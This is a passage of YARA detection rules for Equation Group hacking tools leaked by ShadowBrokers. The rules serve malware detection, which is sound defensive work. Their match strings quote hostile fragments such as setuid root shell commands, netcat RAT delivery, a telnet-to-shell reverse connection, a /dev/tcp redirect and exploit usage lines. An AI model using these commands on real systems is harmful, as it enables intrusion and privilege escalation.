condition: ( filesize < 1KB and all of them ) } rule EquationGroup_tnmunger { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2" strings: $s1 = "TEST: mungedport=%6d pp=%d unmunged=%6d" fullword ascii $s2 = "mungedport=%6d pp=%d unmunged=%6d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 10KB and 1 of them ) } rule EquationGroup_ys_ratload { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75" strings: $x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii $x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $x3 = "CALLBACK_PORT=32177" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 3KB and 1 of them ) } rule EquationGroup_eh_1_1_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628" strings: $x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii $x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii $x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 100KB and 1 of them ) } rule EquationGroup_evolvingstrategy_1_0_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b" strings: $s1 = "chown root sh; chmod 4777 sh;" fullword ascii $s2 = "cp /bin/sh .;chown root sh;" fullword ascii $l1 = "echo clean up when elevated:" fullword ascii $x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii condition: ( filesize < 4KB and 1 of them ) } rule EquationGroup_toast_v3_2_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b" strings: $x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii $s5 = "Roasting ->%s<- at ->%d:%d<-" fullword ascii $s6 = "rbnoil -Roasting ->" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_sshobo { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45" strings: $x1 = "Requested forwarding of port %d but user is not root." fullword ascii $x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii $x3 = "~# - list forwarded connections" fullword ascii $x4 = "packet_inject_ignore: block" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 600KB and all of them ) } rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1" strings: $x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii $x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 80KB and 1 of them ) } rule EquationGroup_packrat { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file packrat" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf" strings: $x2 = "Use this on target to get your RAT:" fullword ascii $x3 = "$ratremotename && " fullword ascii $x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii condition: ( filesize < 70KB and 1 of them ) } rule EquationGroup_telex { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file telex" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef" strings: $x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii $x2 = "target is not vulnerable. exiting" fullword ascii $s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii $s4 = "Timeout waiting for daemon to die. Exploit probably failed." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_calserver { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file calserver" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099" strings: $x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii $x2 = "Writing your %s to target." fullword ascii $x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_porkclient { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748" strings: $s1 = "-c COMMAND: shell command string" fullword ascii $s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii $s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_electricslide { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014" strings: $x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii $x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii $x3 = "Usage: eslide [options] <-t profile> <-l listenerip> <targetip>" fullword ascii $x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of them ) } rule EquationGroup_libXmexploit2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796" strings: $s1 = "Usage: ./exp command display_to_return_to" fullword ascii $s2 = "sizeof shellcode = %d" fullword ascii $s3 = "Execve failed!" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 1 of them ) } rule EquationGroup_wrap_telnet { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4" strings: $s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii $s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 4KB and 1 of them ) } rule EquationGroup_elgingamble { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd" strings: $x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii $x2 = "[-] kernel not vulnerable" fullword ascii $x3 = "[-] failed to spawn shell: %s" fullword ascii $x4 = "-s shell Use shell instead of %s" fullword ascii condition: 1 of them } rule EquationGroup_cmsd { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8" strings: $x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii $x2 = "error: not vulnerable" fullword ascii $s1 = "port=%d connected! " fullword ascii $s2 = "xxx.XXXXXX" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_ebbshave { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b" strings: $s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii $s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii $s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii $s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_eggbasket { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f" strings: $x1 = "# Building Shellcode into exploit." fullword ascii $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii condition: ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_jparsescan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984" strings: $s1 = "Usage: $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii $s2 = "$gotsunos = ($line =~ /program version netid address service owner/ );" fullword ascii condition: ( filesize < 40KB and 1 of them ) } rule EquationGroup_sambal { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file sambal" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec" strings: $s1 = "+ Bruteforce mode." fullword ascii $s3 = "+ Host is not running samba!" fullword ascii $s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii $s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii $s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_pclean_v2_1_1_2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97" strings: $s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii $s6 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and all of them ) } rule EquationGroup_envisioncollision { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1" strings: $x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii $x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii $s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii $s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 20KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_cmsex { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810" strings: $x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii $x2 = "-i target ip address / hostname " fullword ascii $x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii $x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii $x5 = "If one choice fails, you may want to try another." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_exze { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file exze" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876" strings: $s1 = "shellFile" fullword ascii $s2 = "completed.1" fullword ascii $s3 = "zeke_remove" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and all of them ) } rule EquationGroup_porkserver { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file porkserver" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a" strings: $s1 = "%s/%s server failing (looping), service terminated" fullword ascii $s2 = "getpwnam: %s: No such user" fullword ascii $s3 = "execv %s: %m" fullword ascii $s4 = "%s/%s: unknown service" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 3 of them ) } rule EquationGroup_DUL { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file DUL" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e" strings: $x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii $x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them ) } rule EquationGroup_slugger2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf" strings: $x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii $x2 = "command must be less than 61 chars" fullword ascii $s1 = "__rw_read_waiting" fullword ascii $s2 = "completed.1" fullword ascii $s3 = "__mutexkind" fullword ascii $s4 = "__rw_pshared" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ($x*) ) ) or ( all of them ) } rule EquationGroup_ebbisland { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977" strings: $x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii $x2 = "error - shellcode not as expected - unable to fix up" fullword ascii $x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii $x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii $x5 = "-A <jumpAddr> (shellcode address)" fullword ascii $x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_jackpop { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519" strings: $x1 = "%x:%d --> %x:%d %d bytes" fullword ascii $s1 = "client: can't bind to local address, are you root?" fullword ascii $s2 = "Unable to register port" fullword ascii $s3 = "Could not resolve destination" fullword ascii $s4 = "raw troubles" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them ) } rule EquationGroup_parsescan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef" strings: $s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii $s2 = "Usage: $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_jscan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jscan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe" strings: $s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii $s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_promptkill { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d" strings: $x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii $x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_epoxyresin_v1_0_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73" strings: $x1 = "[-] kernel not vulnerable" fullword ascii $s1 = ".tmp.%d.XXXXXX" fullword ascii $s2 = "[-] couldn't create temp file" fullword ascii $s3 = "/boot/System.map-%s" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and $x1 ) or ( all of them ) } rule EquationGroup_estopmoonlit { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220" strings: $x1 = "[+] shellcode prepared, re-executing" fullword ascii $x2 = "[-] kernel not vulnerable: prctl" fullword ascii $x3 = "[-] shell failed" fullword ascii $x4 = "[!] selinux apparently enforcing. Continue [y|n]? " fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_envoytomato { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5" strings: $s1 = "[-] kernel not vulnerable" fullword ascii $s2 = "[-] failed to spawn shell" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_smash { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file smash" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6" strings: $x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii $x2 = "no command given!! bailing..." fullword ascii $x3 = "no port. assuming 22..." fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ratload { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ratload" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398" strings: $x1 = "/tmp/ratload.tmp.sh" fullword ascii $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii $s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ys { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15" strings: $x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii $x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii $x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ewok { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ewok" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72" strings: $x1 = "Example: ewok -t target public" fullword ascii $x2 = "Usage: cleaner host community fake_prog" fullword ascii $x3 = "-g - Subset of -m that Green Spirit hits " fullword ascii $x4 = "--- ewok version" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) } rule EquationGroup_xspy { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file xspy" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf" strings: $s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 60KB and all of them ) } rule EquationGroup_estesfox { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a" strings: $x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii condition: all of them } rule EquationGroup_elatedmonkey_1_0_1_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090" strings: $x3 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii $s5 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii $s13 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii $s15 = "cat > /dev/tcp/127.0.0.1/80 <<END" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 5KB and ( 1 of ($x*) and 5 of ($s*) ) ) or ( all of them ) } rule EquationGroup_scanner { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file scanner" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222" strings: $x1 = "program version netid address service owner" fullword ascii $x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii $x5 = "-scan winn %s one" fullword ascii condition: filesize < 250KB and 1 of them } /* Super Rules ------------------------------------------------------------- */ rule EquationGroup__ftshell_ftshell_v3_10_3_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893" hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951" strings: $s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii $s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii $s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii $s4 = "# ftshell -- File Transfer Shell" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them ) } rule EquationGroup__scanner_scanner_v2_1_2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222" hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff" strings: $s1 = "Welcome to the network scanning tool" fullword ascii $s2 = "Scanning port %d" fullword ascii $s3 = "/current/down/cmdout/scans" fullword ascii $s4 = "Scan for SSH version" fullword ascii $s5 = "program vers proto port service" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them ) } rule EquationGroup__ghost_sparc_ghost_x86_3 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1" hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33" strings: $x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii $x2 = "Sending shellcode as part of an open command..." fullword ascii $x3 = "cmdshellcode" fullword ascii $x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them ) } rule EquationGroup__pclean_v2_1_1_pclean_v2_1_1_4 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97" hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd" strings: $s1 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii $s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and all of them ) } rule EquationGroup__jparsescan_parsescan_5 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan" author = 